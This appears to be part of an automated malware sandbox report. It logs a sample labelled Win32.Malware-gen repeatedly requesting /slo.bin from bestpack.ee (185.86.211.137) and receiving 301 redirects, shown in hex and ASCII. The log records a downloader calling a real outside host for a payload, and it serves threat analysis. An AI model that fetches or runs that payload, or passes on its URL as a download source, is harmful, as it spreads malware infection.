                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.11.2049804185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:02:57.990752935 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:02:58.208281994 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:58 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.11.2049806185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:03:09.383183002 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:03:09.605453014 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:09 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.11.2049808185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:03:20.785826921 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:03:21.004549026 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:20 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      25192.168.11.2049810185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:03:32.174453020 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:03:32.395390034 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:32 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.11.2049812185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:03:43.559664011 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:03:43.781584978 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:43 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      27192.168.11.2049814185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:03:54.960576057 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:03:55.177107096 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:55 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.11.2049816185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:04:06.319405079 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:04:06.538369894 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:06 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.11.2049818185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:04:17.684366941 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:04:17.913446903 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:17 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.11.2049820185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:04:29.031594038 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:04:29.252845049 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:29 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.11.2049822185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:04:40.389682055 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:04:40.607471943 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:40 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.11.2049824185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:04:51.732355118 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:04:51.950937033 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:51 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      33192.168.11.2049826185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:05:03.055321932 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:05:03.272316933 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:03 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      34192.168.11.2049828185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
